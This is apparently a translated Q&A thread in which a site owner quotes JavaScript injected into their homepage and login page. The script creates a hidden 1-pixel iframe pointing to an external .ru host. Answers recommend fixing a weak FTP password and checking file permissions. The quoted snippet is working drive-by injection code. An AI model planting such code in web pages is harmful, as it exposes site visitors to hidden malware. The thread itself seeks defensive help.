0

今日の朝、ホストされているサイトにJavascriptが追加されていることに気づきました。私がホームページをダウンロードしたとき、コードは次のようでした <!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037--> そしてログインページで:

(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email

ウイルス/スパム攻撃だと思います。今はjavascriptコードを削除しましたが、どうすれば自分のサイトをそのような攻撃から防ぐことができるのでしょうか。注意:私のFTPパスワードは非常に弱いです。

4

2 に答える 2

2

注意: 私の FTP パスワードは非常に脆弱です。

あなたは自分が間違っていることを知っていますが、それでも尋ねますか? 最初にそれを修正し、コンピューターも保護します。スクリプトを使用している場合は、ハッキングの試みのログを確認して安全にします。

于 2012-12-31T05:54:31.520 に答える
1

ファイルのアクセス許可が正しいことを確認してください。そうでない場合は、コードが挿入された可能性があります。

これを見てください:

http://ag.arizona.edu/ecat/web/permissions.html

ファイルに対して設定する必要がある主な権限は 3 つあります。

read from the file
write to the file
execute the file

権限の概要は次のとおりです。

ここに画像の説明を入力

于 2012-12-31T06:03:05.130 に答える